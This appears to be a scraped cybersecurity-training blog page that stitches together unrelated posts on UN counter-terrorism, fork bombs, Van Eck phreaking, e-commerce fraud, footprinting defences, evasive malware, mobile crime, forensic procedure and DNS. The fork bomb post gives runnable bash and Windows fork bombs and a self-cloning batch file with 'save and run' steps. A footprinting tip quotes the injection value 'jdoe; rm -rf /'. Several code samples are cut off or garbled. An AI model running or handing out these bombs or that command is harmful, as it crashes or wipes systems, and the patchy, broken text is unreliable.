Home > Blog


Counter Terrorism 

Undoubtedly, the United Nations (UN) has truly not been engaged completely to serve as a platform for counter terrorism dialogue. Even now, the nature of the UN structure and the sovereign will of nation-states are yet to converge practically for a pragmatic solution. Similarly, to counter online extremism and radicalization, both UN and states should open the negotiating door to the private sector internet industries. The need of the hour is a greater cooperation and converging dialogues among all the stakeholders in international peace and security.


Could International community go beyond definitional lines, which are hard to draw or agree broadly on harmful act of terror organisations?The pertinent issues for today are having a clear strategy to contain, to take humanitarian action and to learn from the experience.


In a retrospective, in a short span of time, UN had pressed for two major events to prevent the narratives of violent extremism. The Geneva Conference on Preventing Violent Extremism on April 7 and 8, 2016, jointly organised by Switzerland and the UN first of its kind to address the root cause of terrorism and violent extremism.

To address the threats and find out a comprehensive architecture the President of the General Assembly, Mogens Lukketoft, organised a high-level Thematic Debate of the UN General Assembly focused on UN Peace and Security on May 10 and 11, 2016. The high-level debate was staged to identify key threats and engage in a strategic reflection about today’s challenges to international peace and security.

At the outset, they reaffirmed that ‘terrorism in all its forms and manifestations constitutes one of the most serious threats to international peace and security, the UNSC also requested its main counter-terrorism subsidiary body to present a proposal by April 30, 2017 for a comprehensive international framework on the matter’.

Narrowly, this debate had underlined two factors: role of private sector in non traditional security affairs and strong commitments to numb the crisis. However, the fact that remains to be seen is what would be the outcome of the aforesaid documents. On the contrary, considering the nature of technological advancements and providing a year to present the proposal is showing thin commitments on pressing issues.

download-1With all regards to some significant anecdotal achievements of the UN during the Cold War still it remains a place for ‘unproductive dialogue’. Put it in other way, when it comes to the UN to address hard-line security issues, ‘realists say no; intuitionalists say yes’, to borrow J. Mearsheimer’s idea from ‘the false promise of International Institutions’. It also became evident when the Indian Prime Minister, Narendra Modi addressed a gathering of India Diaspora in Brussels in April 2016. He underlined that the world body is not defining terrorism and handling the threat in an adequate fashion.

On a similar note, the former Indian Permanent Representative to the UN, Hardeep Singh Puri, narrated that ‘the UN, often regarded as the ‘heart’ of the multilateral system, is fading towards obscurity being describe more of a NGO rather than a governing multilateral institution’ in his talk ‘Is the UN fit for its purpose at 70?’ at the Observer Research Foundation on December 5 2015.

In retrospect, the second decade of the twenty first century began with a very unequal diffusion of power resources. From this vantage point, three scenarios could be drawn — Scenario 1 — State v/s State; Scenario 2 — State v/s non-state actors (non-violent) and Individual; Scenario 3 — Violent non-state actor v/s state, individual and non-state actors. This is also reckoning the post Cold War security debate viz. national security v/s human security.

Swiftly, the significant changes in currents of geopolitics and rise of post-Westphalian threats and challenges have become a major concern for the policy makers, than the theoretical debates of IR. The post-Westphalian threats and challenges include violent non-state actors — terrorist, hackers, organised syndicates, drug cartels and challenges viz. pandemics and climate change.

There is nevertheless reason to worry. Could the UN manage multifaceted challenges of the time? One hand the old actors — the nation states; new actors — transnational corporation (specifically internet and telecommunication service providers); and modern barbarians have been threatening and impinging challenges to the very existence of the UN.

Deconstruction of J. Nye ‘Chessboard Model’ would be canvassed as – first layer is nation state (military power), second layer transnational corporations (economic power) and third layer is terror organisations. In this interconnected world order State should cooperate and co-opt with private sectors to numb the violent extremism.

This is why first time Steve Crown, Vice-President and Deputy General Counsel of Microsoft Corporation had addressed the world body pertaining to the terror issues. This led to the question where, when and how a comprehensive partnership between public and private sector will forge a common line to address the cyber terror issues.

The discourse of our time is the role of private sectors or big business in international security. This has been a much debated issues since 1990s and pertinent after 9/11 security affairs. In this new security paradigm private sector has a lot more to deliver for the peace and security.

However, it would make sense to factor in the fact that to stifle cyber terrorism, private sector has to be called in for doing so will heighten the prospects of countering the menace that is proliferating at a pace faster than ever. While addressing the world body Crown said that public-private partnerships are the appropriate response to cyber terrorism. It is a daunting challenge for both governments and internet industries.


Terrorists manipulate the internet platforms, yet there is no distinguished solution to the issues. All the scientific innovations including ICT could be used for either good or evil. The internet industry was built on the idea that communications could untie human latent qualities. However, the most of the internet giants including Google, Facebook and Twitter, have been engaging with strong intent cyber platforms were abused. For instance, there is greater degree of unity displayed in combating online child sex abuse than say terrorist exploitation of technology services.

However, Crown also underlined that ‘we need to admit what we do not know’. Ostensibly, we do not know that is the ‘definition and solution’ to it. The need is that all stakeholders should work together in a coordinated and transparent way.

There are few takeaways for India first India should endow with an equitable definition of terrorism. Second, New Delhi should engage with international and regional institutions to address the issues more pragmatically. Last, but not the least, India should learn from its past mistakes. After the 26/11 terrorist attacks in Mumbai, big Indian business communities had shown greater concern for the lack of security architecture and cooperation between public and private sectors. Some open sources assessments have suggested that Indian private industries have been performing well in security and intelligence analysis.

Therefore, there is no harm in forging amicable partnerships to gain help in countering online radicalization or left wing extremism or disaster management. Still there is a long way to go; PPP model, perhaps, can offer some solutions for virtual and real world. Having said that, what remains to be seen is when and how the clear intent to allocate authoritative values for comprehensive security will become a reality.


Reference :

  1. Observer Research Foundation

Author :

1. Cialfor

Updated :

1. 27/9/2016




FORK BOMB (also called WABBIT OR RABBIT VIRUS) is equivalent to a denial-of-service attack on your own system .it aims at depriving the system off its RAM (Random Access Memory
), leaving none for vital action required to keep the system running, hence cracking it wherein a process continually replicates itself to deplete available system resources, causing and slowing or crashing the system it’s just a 5 characters long, The fork bomb is not deadly to the computer, just annoying.


The first version of a fork bomb called wabbit was reported to run on a system/360 in 1978. It have derived from a similar attack called RABBITS reported from 1969 at the University of Washington.

Implementation & Operation

Fork bombs operate by consuming CPU time in the process of forking (it is an operation whereby a process creates a copy of itself. It is usually a system call implemented in the kernel Fork is the primary method of process creation on Unix-like operating systems.) , and by saturating the operating system process table

A basic implementation of a fork bomb is an infinite loop that repeatedly launches the same process..

Fork Bomb


Every Program doubling itself is a form of exponential growth. After one iteration of the loop, two programs are created. After Another cycle each of these create other two for a total of four same programs after 10 iteration we have 2^10 =1024 programs, after 100 iterations we have 2^100=1.267 nonillion.

Even with Today’s CPUs and RAMs being in Giga Range, the first program will probably not even complete 50 iterations before running out of memory.

Every iteration would take around a few milliseconds, so running it will definitely crash the computer

In UNIX operating systems, fork bombs are generally written to use the fork system call. As forked processes are also copies of the first program, once they resume execution from the next address

the frame pointer, they also seek to create a copy of themselves; this has the effect of causing an exponential growth in processes. As modern UNIX systems generally use copy-on-write when forking new processes, a fork bomb generally will not saturate such a system’s memory.

Microsoft Windows operating systems do not have equivalent functionality to the UNIX fork system call a fork bomb on such an operating system must therefore create a new process instead of forking from an existing one.


How to do fork bombing in different operating system???


  • A fork bomb using the BASH (A Terminal used in LINUX) shell:

:(){ :|:& };:


  • A fork bomb using theMicrosoft windows:

:s Start “” %0 goto s


  • The same as above, but shorter:



  • UsingPython:



import os

while True:



  • USING C:


#include <unistd.h>



int main(void)






JAVA SCRIPT code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:



while (true) {

  var w =;





Or, a more aggressive version:



setInterval(function() {

var w =;


}, 10);







Step 1: Copy the following code in notepad:

@echo off

set name=%0

set clone=1



If not exist clone%clone%.bat (

copy “%name%” “clone%clone%.bat”

) else (

set /a clone=%clone%+1

GoTo clone


start %name%

start clone%clone%.bat

GoTo start


Step2 : Save it with a file extension .bat

Step3: Run it …..




  1. Fork bombs are really very difficult to stop once started. Stopping a fork bomb from reproducing further requires stopping of all running copies, which is really very difficult to achieve.
  2. The second major problem is that in the time taken between finding the processes to terminate and actually terminating them, more may have been created.


Some fork bombs can be stopped relatively easily.


:(){ :|: & };:


By replacing the function identifier: by bomb and re-indenting, the code reads:


bomb() {

bomb | bomb &




Fork bomb is a function that  can run in the background, (&) ensures that the child process does not die and keeps forking new copies of the function and result in consuming system resources.

A “feature” in this  code means that a fork bomb process  no longer fork doesn’t stick , but rather exits. In such a situation, if we try to run a new process, one will successfully start. If the new process does nothing,. At this point the do-nothing processes can exit. The following short  code might get rid of the above fork bomb in about a minute


.While (sleep 100 &) do; done


Alternatively, stopping (“freezing”) the bomb’s processes can be used so that a subsequent can terminate them without any of the parts re-replicating due to newly available process slots:


killall -STOP processWithBombName

killall -KILL processWithBombName


When a system is low on free PIDS (in Linux the maximum number of pids can be obtained from /proc/sys/kernel/pid_max), defusing a fork bomb becomes more difficult:


$ killall -9 processWithBombName

Bash: fork: Cannot allocate memory


In this case, defusing the fork bomb is only possible if at least one shell is open. Processes may not be forked, but one can execve() any program from the current shell. Typically, only one attempt is possible.

killall -9 is not executed directly from the shell because the command is not atomic and doesn’t hold locks on the process list, so by the time it finishes the fork bomb will advance some generations ahead. So one must launch a couple of killall processes, for example:


while :; do killall -9 processWithBombName; done


On LINUX because the process table is made accessible through the /proc file system, it is possible to defuse the fork bomb using bash built-ins which do not require forking new processes. The following example identifies offending processes, and suspends them in order to prevent their continuing to fork while they are killed one at a time. This avoids the race condition of other examples, which can fail if the offending processes can fork faster than they are killed.


cd /proc && for p in [0-9]*; do read cmd < “$p/cmdline”; if  [[ $cmd = processWithBombName ]]; then kill -s STOP “$p” || kill -s KILL “$p”; fi; done


Preventive measures

The fork bomb’s mode of operation is entirely encapsulated by creating new processes; one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own.

Reference :


Author : cialfor

Updated : 9/26/2016

Van Eck Phreaking- A Hack Using E-Radiations


Van Eck phreaking is a form of eavesdropping in which special equipment is used to pick up side-band electromagnetic emissions from electronics devices that correlate to hidden signals or data for the purpose of recreating these signals or data in order to spy on the electronic device. Side-band electromagnetic radiation emissions are present in, and with the proper equipment, can be captured from keyboards, computer displays, printers, and other electronic devices.


Van Eck phreaking of CRT displays is the process of eavesdropping on the contents of a CRT by detecting its electromagnetic emissions. It is named after Dutch computer researcher Wim van Eck, who in 1985 published the first paper on it, including proof of concept. Phreaking is the process of exploiting telephone networks, used here because of its connection to eavesdropping.


Basic principle

Information that drives the video display takes the form of high frequency electrical signals. These oscillating electric currents create electromagnetic radiation in the RF range. These radio emissions are correlated to the video image being displayed, so, in theory, they can be used to recover the displayed image.


In a CRT the image is generated by an electron beam that sweeps back and forth across the screen. The electron beam excites the phosphor coating on the glass and causes it to glow. The strength of the beam determines the brightness of individual pixels . The electric signal which drives the electron beam is amplified to hundreds of volts from TTL circuitry. This high frequency, high voltage signal creates electromagnetic radiation that has, according to Van Eck, “a remarkable resemblance to a broadcast TV signal”. The signal leaks out from displays and may be captured by an antenna, and once synchronization pulses are recreated and mixed in, an ordinary analog television receiver can display the result. The synchronization pulses can be recreated either through manual adjustment or by processing the signals emitted by electromagnetic coils as they deflect the CRT’s electron beam back and forth.[1]

In the paper, Van Eck reports that in February 1985 a successful test of this concept was carried out with the cooperation of the BBC. Using a van filled with electronic equipment and equipped with a VHF antenna array, they were able to eavesdrop from a “large distance”.

Van Eck phreaking and protecting a CRT display from it was demonstrated on an episode of Tech TV’s The Screen Savers on December 18, 2003.


In April 2004, academic research revealed that flat panel and laptop displays are also vulnerable to electromagnetic eavesdropping. The required equipment for espionage was constructed in a university lab for less than US$2000.

Communicating using Van Eck phreaking

In January 2015, the Airhopper project from Georgia Institute of Technology, USA demonstrated (at the Ben Gurion University, Israel) the use of Van Eck Phreaking to enable a keylogger to communicate through video signal manipulation keys pressed on the keyboard of a standard PC computer, to a program running on Android cellphone with earbud radio antenna.

Tailored Access Batteries

A tailored Access Battery is a special laptop with Van Eck Phreaking electronics and power-side band encryption cracking electronics built-into the casing of the battery in combination with a remote transmitter/receiver. This allows for quick installation and removal of spying device by simply switching the battery.


Countermeasures are detailed in the article on TEMPEST, the NATO’s standard on spy-proofing digital equipment. One countermeasure involves shielding the equipment to minimize electromagnetic emissions. Another method, specifically for video information, scrambles the signals such that the image is perceptually undisturbed, but the emissions are harder to reverse engineer into images. Examples of this include low pass filtering fonts and randomizing the least significant bit of the video data information.

Another approach is to randomly shift the frequency of the clock used on keyboards with a custom chip containing a pseudorandom number generator (PRNG) with a long length and use an identical synchronized PRNG at the reception end to confound such attacks.


Eckbox is van Eck phreaking software. It interprets a radio signal emanating from a computer’s monitor to recreate the image (in black and white) that is displayed on it. This could be used as a valuable security tool for testing otherwise secure computers, or for developing hardware and software to counter this type of remote shoulder-surfing.



Reference :


author : cialfor

Updated : 9/26/2016


Introduction  To E-Shoplifting

The word shoplifting also known as (boosting or Five finger discount) means the art of stealing goods from a retail establishment as opposed to burglary or robbery.  In the world of cyber, the term e-Shops refer to the retail establishment online which deals with selling of goods over the internet.

e-shoplifting is the modern art of concealing goods from an online e-commerce store with the interest of getting it for free or a lesser cost. The e-shoplifting is a trending Cyber Crime mechanism which gives a major threat to the e-Merchandise, banks, payment-gateways, and e-commerce organizations now-a- days.




                                                        Basic Elements of an Electronic Business


Payment Gateway :

The Payment gateway is an e-commerce application that ensures security measures for transactions performed online. When a customer adds a product to the cart, it directs him to the payment gateway to make the transaction using the desired bank to pay for the product. The gateways provide a One Time Password (OTP) for the customers to use the gateway, so that the transaction takes place securely. 

Multi-Layer Components :

Multi-Layer Component in the e-Commerce system is the layer that provides a link between different components of the system and brings it to one platform. The Multi-Layer components in the e-commerce stores links the database of the store and the Payment gateway with the Store Front-End.

Shopping Cart System :

The Shopping cart system is the temporary storage area which the e-commerce sites provide to purchase multiple goods at the same time. It gives a good result at the customer’s end by allowing the customer to purchase multiple products from different dealers who have registered with the e-store. It also allows the user to get the overall price estimate of the product added to the cart.

Session Management System :

The Session management session in the e-commerce sites allows the store to have a track of all the user’s log in and log out sessions. By this the store will have a track of the customers registered with the store. It also maintains the cookie policy management of the e-commerce store and has a track of the cookies.

Customer :

Also referred to as the buyer is the individual who makes use of this e-commerce stores to purchase a product.


Flaws in e-commerce systems :




  • Poor input validation by the e-commerce sites allows the hackers to trespass the gateway of the servers of the e-commerce sites. The validation in the e-shops are required to authenticate weather the data that enters the server from the user’s end is genuine or not, when poor monitoring is performed the validation becomes poor, where in the user without any proper authentication from the server’s end, trespasses the server and inserts malicious codes in the server, which later triggers manipulation of data in the server.


  • Hidden field manipulation is a type of attack performed on e-shops. Hidden fields are often used by retailers to save information about a customer’s session. Many also use this to save merchandise prices. On unprotected sites hackers can also use this field to manipulate prices, by which they can conceal the items for a lesser fee or for free.


  • Improper use of cookies allows the hackers to manipulate the cookies used by the e-shops and exploit the shops. Cookies are set by the e-commerce sites to track the previous used session of the customers. Once a customer logs in to the e-commerce site it creates a small file with your system information and saves it in the customers computer, so that if some item is left in the cart in the previous session it will still remain when the customer logs in the next time. The hackers insert malicious codes in these cookies and log in to the e-commerce sites. Once the session has successfully started the malicious codes manipulates the webpage.


  • Poor session or state tracking at the websites end is also a flaw in the e-shops. Every time the user logs in to the website, it registers a session in the e-commerce database. Due to poor session tracking the hacker can easily bypass the security mechanism and can perform various actions in the e-commerce sites and its database.


  • Improper database Integration means poor protection or monitoring of the database of the e-commerce sites. These databases contain the cost of the products, the customer details and the supplier details. The hacker trespasses this database which is in the SQL format, by either one of the previous flaws and exploits the database using SQL Injection. It is a code injection technique used to attack SQL Databases. Once the SQL injection is inserted in the database, it will change the price values of all the products.


  • Security loopholes in payment gateways is a major attack in the e-commerce market. The hacker enters the e-commerce site, makes a purchase in the site using one of the steps mentioned earlier. Once the product is added to the cart, he clicks on payment and selects the payment method. When he clicks on pay, the e-commerce site directs him to a payment gateway registered with the e-commerce site. During this process the hacker extracts the script code of the payment gateway site and manipulates the script and changes the price value of the product purchased, due to which he gets the product at a lesser cost.


Author : cialfor

Updated : 9/26/2016

Reference :








How to Fight Footprinting

  1. Place offline any information that has the potential to identify and compromise (By footprinting)  your organization’s security such as access to business plans, formulas, and proprietary documents. to secure data from footprinting attack.
  2. Determine the level of information that is necessary for the public about your organization and make only that piece available on the network.
  3. Visit your organization on the Web to determine current insecurities and the attributes for protection.
  4. Run a ping sweep on your organizational network to see results.
  5. Familiarize yourself with the American Registry for Internet Numbers (ARIN) to determine network blocks.


Top Ten Ways to Secure Against Attack


  1. Keep patches up to date by installing weekly or daily if possible. Buffer overflow and privilege escalation attacks can usually be prevented by keeping patches up-to-date. Check your vendor’s site daily for new patch releases and monitor the Computer Emergency Response Team’s site,, for information on the latest vulnerabilities.
  2. Shut down unnecessary services/ports. Review your installation requirements by eliminating unnecessary services and applications. Perform a post-installation lockdown and hardening of the machine. Lance Spitzner, Senior Security Architect for Sun Microsystems, Inc. authors a useful site,, with more information.
  3. Change default passwords by choosing strong passwords that utilize uppercase/ lowercase/ numbers/special characters. Some database applications create a database administrator account with no password. To protect against this vulnerability, test the accounts after install, and if no password is found on any account, disable the account or set a strong password. Weak passwords are not much better than no password at all. Examples of weak passwords include the user’s name, birth date, or a dictionary word. Educate your administrators and users about the importance of strong passwords. A strong password should contain upper and lower case letters, as well as numbers and special characters (!, #, $, etc). A strong password should also be at least 7-8 characters in length, depending on operating system. Many operating systems provide means for requiring complex passwords, when enabled. More extreme countermeasures include one-time password mechanisms.
  4. Control physical access to systems. Protecting physical access to computer systems is as important as protecting computer access. Be sure employees lock down consoles when not in use—an unlocked desktop screen can instantly allow a hacker access to the network as a privileged user. A hacker may also gain access to the network via a network jack in a conference room or any non-restricted area. Data centers and network closets should be treated with vigilance as well. Even a locked door may not be enough protection in the face of a determined attacker. Alarms, video cameras, raised floors, security guards, customer accessible cages, biometric scans, and ID cards may be necessary to adequately defend against network attacks.
  5. Curtail unexpected input. Some Web pages allow users to enter usernames and passwords. These Web pages can be used maliciously by allowing the user to enter in more than just a username. Username: jdoe; rm -rf / This might allow an attacker to remove the root file system from a UNIX Server. Programmers should limit input characters, and not accept invalid characters such as |; < > as possible input.1 (2)
  6. Perform backups and test them on a regular basis.
  7. Educate employees about the risks of social engineering and develop strategies to validate identities over the phone, via e-mail, or in person.
  8. Encrypt and password-protect sensitive data. Data such as Web accessible e-mail should be considered sensitive data and should be encrypted. This will discourage any type of sniffer program or exposure of sensitive company data.
  9. Implement security hardware and software. Firewalls and intrusion detection systems should be installed at all perimeters of the network. Viruses, Java, and ActiveX can potentially harm a system. Anti-virus software and content filtering should be utilized to minimize this threat.
  10. Develop a written security policy for the company. These methods will help to lessen attacks of footprinting, which lead to your computer or your company being hacked. With that said, a company has to stay vigil at all times due to new methods of intrusion being developed almost daily.

Author : cialfor

Updated : 9/26/2016

Reference :

  1. wikipedia
  2. image credit to google
  3. introduction to cyber security –  Data64


Nonstandard ports and port hopping (network security). Evasive applications are one of the key factors leading to the demise of traditional port-based firewalls. However, traditional IPS and threat products also rely heavily on port to determine which signatures or analysis to apply to the traffic. This weakness is magnified by the fact that APTs are often communicated from the inside of an infected network back to the remote attacker outside. This gives the attacker full flexibility to use any port, protocol, and encryption that he wants — fully subverting any portbased controls in the process.

SSL encryption. Malware creators rely heavily on various forms of encryption to hide the infection of traffic, as well as the ongoing command-and-control traffic associated with botnets. SSL is a favorite, simply because it has become a default protocol for so many social media sites, such as Gmail and Facebook. These sites are coincidentally very fertile ground for social engineering and malware delivery. As a result of SSL encryption, many IT security teams lack the ability to see malware traffic on their network. Other types of encryption have also become popular for hiding malware traffic. Peer-to-peer applications provide both infection and command-and control capabilities, and often use proprietary encryption, again allowing malicious content to pass through the traditional network perimeter undetected.


 Tunneling. Tunneling provides yet another tool for attackers to hide malicious traffic. Many applications and protocols support the ability to tunnel other applications and protocols within them. This lets attackers disguise their communications as allowed services or applications to get past traditional perimeter security solutions.


Proxies. Advanced malware and hackers use proxies to traverse traditional firewalls. TDL-4, the “indestructible botnet” (refer to Chapter 2) installs a proxy server on every host that it infects. This allows the bot to not only protect its own communications, but also to establish an anonymous network that anyone can use to hide his tracks while hacking or conducting other illegal activities.


 Anonymizers and circumventors. Tools such as UltraSurf, Tor, and Hamachi are purpose-built to avoid network security controls. Unlike most of the other technologies discussed in this section, circumventors have almost no legitimate use in an enterprise network. These applications are updated on a monthly (and even weekly) basis to avoid detection in a perpetual cat-and-mouse game with traditional security solutions.


Encoding and obfuscation. Malware almost always encodes transmissions in unique ways. Encoding and obfuscation not only help them avoid detection signatures, but also hide the true goal of the malware. This technique can be as simple as converting strings to hexadecimal, or as sophisticated as developing custom algorithms for detailed translations.


Port-based firewalls are often used as a first line of defense, providing coarse filtering of traffic and segmenting the network into different password-protected zones. One drawback to port-based firewalls is that they use protocol and port to identify and control what gets in and out of the network. This port-centric design is ineffective when faced with malware and evasive applications that hop from port to port until they find an open connection to the network. Such firewalls themselves have little ability to identify and control malware. Solutions that have added anti-malware capabilities to portbased firewalls either as a blade module or as a UTM (Unified Threat Management) platform have typically suffered from poor accuracy and severe performance degradation.

firewall (1)


 Intrusion prevention

IPSs provide a step in the right direction, in that they look much deeper into the traffic than a firewall does. However, IPS solutions typically don’t run a complete set of IPS signatures against all traffic. Rather, the IPS attempts to apply the appropriate signatures to specific types of traffic, based on port. This limitation means that malware or exploits on unexpected or nonstandard ports are likely to be missed. Additionally, IPS solutions lack the depth of malware detection needed to protect networks — most IPS solutions only look for a few hundred types of common malware — well short of the tens of thousands that exist.


Proxies Solution

Proxy solutions are another means of network traffic control. But they too look at a limited set of applications or protocols and only see a partial set of the network traffic that needs to be monitored. By design, proxies need to mimic the applications they are trying to control so they struggle with updates to existing applications and new applications. As a result, although proxies understand a few protocols in depth, they typically lack the breadth of protocol support needed to control the tunnels and protocols within protocols that hackers use to hide their true traffic. A final issue that plagues proxy solutions is throughput performance, caused by the manner in which a proxy terminates an application on the proxy and then forwards it on to its destination. The challenge with any of these network controls is that they do not have the ability to accurately identify applications and malware; they look at only a portion of the traffic and suffer from performance issues. Security policies must be based on the identity of users and the applications in use — not just on IP addresses, ports, and protocols. Without knowing and controlling exactly who (users) and what (applications and content) have access to the network, enterprise networks may be compromised by applications and malware that can easily bypass port-based network controls.


Network controls

Given that advanced threats most often use the network for infection and ongoing command and control, the network is an obvious and critical policy-enforcement point. With application-enablement policies in place, IT can shift its attention to inspecting the content of allowed traffic. This inspection often includes looking at traffic for known malware, command-and-control patterns, exploits, dangerous URLs, and dangerous or risky file types. When possible, policies that focus on the content of traffic should be coordinated as part of a single unified policy, where the rules (and the results of those rules) can all be seen in context. If content policies are spread across multiple solutions, modules, or monitors, piecing together a coordinated logical enforcement policy becomes increasingly difficult for IT security staff. Understanding whether these policies are working once they are implemented will likewise be difficult. The goal should be to create written policies that reflect the policies’ intentions just like someone might describe them orally. For example, “only allow designated employees to use SharePoint, inspect all SharePoint traffic for exploits and malware, disallow the transfer of files types X, Y, and Z, and look for the word confidential in traffic going to untrusted zones.” Another key component of network policies is the absolute need to retain visibility into the traffic content. SSL is increasingly used to secure traffic destined for the Internet. Although this may provide privacy for that particular session, if IT lacks the ability to look inside the SSL tunnel, SSL can also provide an opaque tunnel within which malware can be introduced into the network environment. IT must balance the need to look within SSL against both privacy requirements for end-users and the overall performance requirements of the network. For this reason, it is important to establish SSL decryption policies that can be enforced selectively by application and URL category. For example, social media traffic could be decrypted and inspected for malware, while traffic to financial or healthcare sites is left encrypted.


Endpoint controls

The end-user’s machine is the most common target for advanced malware and is a critical point for policy enforcement. Endpoint policies must incorporate ways of ensuring that antivirus and various host-based security solutions are properly installed and up to date. Although targeted attacks are becoming more common, the majority of threats today continue to be known threats with known signatures. Gartner, Inc. predicts that known threats will comprise 95 percent of all threats through 2015. As such, these endpoint solutions must be kept up to date and must be audited regularly. Similarly, you need to have a method for validating that host operating systems are patched and up to date. Many malware infections begin with a remote exploit that targets a known vulnerability in the operating system or application. Thus, keeping these components up to date is a critical aspect of reducing the attack surface of the enterprise. As with employee policies, desktop controls are a key piece to the safe enablement of applications in the enterprise. Desktop controls present IT departments with significant challenges. Careful consideration should be applied to the granularity of the desktop controls and the impact on employee productivity. The drastic step of desktop lockdown to keep users from installing their own applications is a task that is easier said than done and, if used alone, will be ineffective. Here’s why:

✓ Remotely connected laptops, Internet downloads, USB drives, and e-mail are all means of installing applications that may or may not be allowed on the network.

✓ Completely removing administrative rights is difficult to implement and, in some cases, severely limits end-user capabilities to an unacceptable level.

✓ USB drives are now capable of running applications, so a Web 2.0 application, for example, can be accessed after network admission is granted.

Desktop controls can complement documented employee policies as a means to safely enable Web 2.0 applications.


Author : cialfor

Updated : 9/26/2016

Reference :

  1. wikipedia
  2. image credit to google
  3. introduction to cyber security –  Data64

Why is mobile a tool of crime ?

The creativity and Innovation of the great master Sir Martin Cooper has made a drastic change in the current generation of the world’s most interactive beings. Mobile phones in today’s world have completely replaced a personal computer or a laptop and is made smart for people to do things faster and smarter. Mobile Phones have changed the history of the technological world by bringing in a combination of techniques, to fulfill the basic necessity of today’s generation.

The Mobile phone has become a key role playing component in the life of a common man. Starting from 16 to 60’s without any age limit, the present generation has carved a everlasting path in the skilled growth of the mobile industry creating a boom in the electronic sector. The usage of mobile devices paved a path for the successful growth in the electronic industry.


Ever since the usage of Mobile Phones carved a booming path in common man’s life, It made it easy for the cyber criminals to use mobile as a medium or tool of attack. When growth of technology created a good impact in the life of a common man, The same technological growth was used to tamper the life of a common man.

Types of mobile phone related crimes


Vishing :

Vishing is the act of using the telephone in an attempt to scam the user into surrendering private information that will be used for identity theft. The scammer usually pretends to be a legitimate business, and fools the victim into thinking he or she will profit.


  • Purpose :
    • To extract sensitive information from the victim, by means of social engineering.
    • Cheating by personation.
    • Identity theft

Smishing :

Smishing is a security attack in which the user is tricked into downloading a Trojan horse, virus or other malware onto his cellular phone or other mobile device. smishing is short for “SMS phishing.”
Just like phishing, smishing uses cell phone text messages to lure consumers in. Often the text will contain an URL or phone number. The phone number often has an automated voice response system. And again just like phishing, the smishing message usually asks for your immediate attention.
In many cases, the smishing message will come from a “5000” number instead of displaying an actual phone number. This usually indicates the SMS message was sent via email to the cell phone, and not sent from another cell phone.


  • Purpose :
    • To steel sensitive data from the victim’s mobile by using a malware.
    • Act of Social Engineering.
    • To track the victim’s device by sending a malware to the device

Lottery Scams :

A lottery scam is a type of advance-fee fraud which begins with an unexpected email notification, phone call, or mailing (sometimes including a large check) explaining that “You have won!” a large sum of money in a lottery.


  • Purpose :
    • To make the victim believe that he has won a lottery and extract sensitive information from him.

The Blue Bugging :


This attack involves the virtual takeover of the victim’s phone by performing a backdoor mechanism. A backdoor is generally performed by a developer in the case of troubleshooting a problem, but this mechanism is also performed by attackers to gain access into the victim’s device by bypassing the security mechanism.

Blue Jacking :


It is a milder version of Blue bugging, it involves sending anonymous, unwanted messages to other users with Bluetooth-enabled mobile phones. A Bluejacker uses a feature originally intended for exchanging contact details or Electronic-Business cards. The attacker adds a new entry in the address book, types in a message and sends it via Bluetooth

Blue Snarfing :


Bluesnarfing is the theft of data from a Bluetooth phone. The attacker, just by running the right software on their laptop, can discover the nearby phone, connect to it without confirmation and download confidential data. Even by turning off the Bluetooth a potential victim cannot be safe from being Bluesnarfed. As a device in hidden state may also be Bluesnarfable by guessing the device’s MAC address via a brute force attack.

Reference :

Author : cialfor

Updated : 9/26/2016


Cyber Crime Investigation is the collection, analysis and

Investigation of digital evidence and cyber trails.

These digital evidence and cyber trails may be found in

Computer hard disks, cell phones, CDs, DVDs, pen drives,

Computer networks, the Internet etc.




Digital evidence and cyber trails can be hidden in pictures

(stenography), encrypted files, password protected files,

deleted files, formatted hard disks, deleted emails, chat

transcripts etc.


Digital evidence and cyber trails can relate to online banking

fraud, online share trading fraud, source code theft, credit card

fraud, tax evasion, virus attacks, cyber sabotage, phishing

attacks, email hijacking, denial of service, hacking, divorce

cases, murder cases, organized crime, terrorist operations,

defamation, pornography, extortion, smuggling etc.





The following are the steps to be taken and points to be borne

in mind by the investigating officer.


Let us take the example of the suspect computer or computer

systems present in an organization.


  1. The officer should have some members of a police team

with him. They will assist him in maintaining order

while the investigation is being carried out.


  1. The team of experts should be prepared (with the

required tools) for conducting any kind of examination

on the suspected systems.


  1. On reaching the scene of investigation, the police

officers should seal the entrances and exits to the place.


  1. They should ask the employees of the organization to

move away from their machines. If possible, the

employees should be made to gather in a room where

no machines are present.


  1. The employees should be retained till their statements

(if required) have been taken.


  1. The fingerprint experts should gather any fingerprints

available from the machines, which are to be

investigated. This may, at times, assist in revealing the

person(s) who have used a computer. The results of the

fingerprinting exercise can then be compared with the

access control policy of the organization to verify

whether any unauthorized access has taken place.


  1. The computer experts should locate all the important

servers and also understand the layout of the network.

They should also make a chart of the network. At times,

this assists in understanding the path for the flow of



  1. There should be regular and meticulous documentation

of every step being taken. This will prove invaluable

while proving the authenticity and accuracy of the

investigation in a court of law.


Reference :

Author : cialfor

Updated : 9/26/2016

Domain Name System

DNS is a distributed database that contain mappings of DNS domain names to data. It’s also a protocol for transmission control Protocol/ Internet Protocol (TCP/IP) networks, defined by the Requests for comments (RFCs) that pertain to DNS. DNS associates various information with domain names assigns to each of the participating entities. DNS not only translates it also memorize domain name and co related IP Address new to that server. The internet maintain two principal namespaces, The domain name hierarchy and the Internet Protocol address spaces.

Domain Name Space

A Domain namespace is a name service provider by the Internet for Transmission Control Protocol / Internet protocol . DNS is broken up into domains ,a logical organization of computers that exist in a larger network . Domain name space are organized as Root of a tree . Each branch is a domain, each sub branch is a subdomain .




DNS Caching

Even communication between user and host take up a few hundred milliseconds to send and receive any message or query but sometime server can response very slow due to huge traffic. The easy way to speed up this process is catch the information locally thereby eliminating the need for repetitive queries to the remote DNS server. This is done by connecting local database on your computer, rather than the remote DNS server. PostCast server contacts the remote DNS server once , and then caches (memorizes) the addresses returned from query . So the next time every request come for same domain address it instantly returns the answer ,without having to contact your ISP’s DNS server to ask it for translation .
Domain Name Catching

DNS Resolver

